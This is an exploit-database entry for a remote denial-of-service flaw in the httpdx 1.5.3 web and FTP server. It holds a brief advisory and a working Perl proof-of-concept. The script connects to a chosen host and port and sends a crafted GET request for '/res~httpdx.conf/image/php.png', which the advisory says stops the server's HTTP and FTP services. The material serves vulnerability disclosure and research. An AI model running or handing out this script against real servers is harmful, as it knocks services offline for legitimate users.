httpdx 1.5.3 - '.png' File Handling Remote Denial of Service

Author: Jonathan Salwan
type: dos
platform: windows
port: 
date_added: 2010-03-10  
date_updated: 2014-06-13  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 33733.pl  
source: https://www.securityfocus.com/bid/38638/info

The 'httpdx' program is prone to a denial-of-service vulnerbaility.

Remote attackers can exploit this issue to cause the server to stop responding, denying service to legitimate users.

This issue affects httpdx 1.5.3; other versions may also be affected.

#!/usr/bin/perl
#
# Program          : Httpdx v1.5.3
# PoC		   : Remote Break Services
# Homepage         : http://sourceforge.net/projects/httpdx/
# Found by         : Jonathan Salwan
# This Advisory    : Jonathan Salwan
# Contact          : submit@shell-storm.org
#
#
# //----- Application description
#
# Single-process HTTP1.1/FTP server; no threads or processes started per connection, runs
# with only few threads. Includes directory listing, virtual hosting, basic auth., support
# for PHP, Perl, Python, SSI, etc. All settings in one config/script file.
#
#
# //----- Description of vulnerability
#
# The vulnerability is caused due to an input validation error when processing HTTP requests. This can be
# exploited to break all services http & ftp.
#
#
#
# //----- Credits
#
# http://www.shell-storm.org 	<submit@shell-storm.org>
#
#


use IO::Socket;
print "\n[x]Httpdx v1.5.3 - Remote Break Services\n";

	if (@ARGV < 1)
		{
 		print "[-] Usage: <file.pl> <host> <port>\n";
 		print "[-] Exemple: file.pl 127.0.0.1 80\n";
 		exit;
		}

	$ip = $ARGV[0];
	$port = $ARGV[1];


$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Connecting: Failed!\n";

	print "[+] Sending request: GET /res~httpdx.conf/image/php.png HTTP/1.1\\r\\nHost: $ip\\r\\n\\r\\n";
	$msg = 	"GET /res~httpdx.conf/image/php.png HTTP/1.1\r\nHost: $ip\r\n\r\n";
	$socket->send($msg);

print "\n[+] Done.\n\n";

close($socket);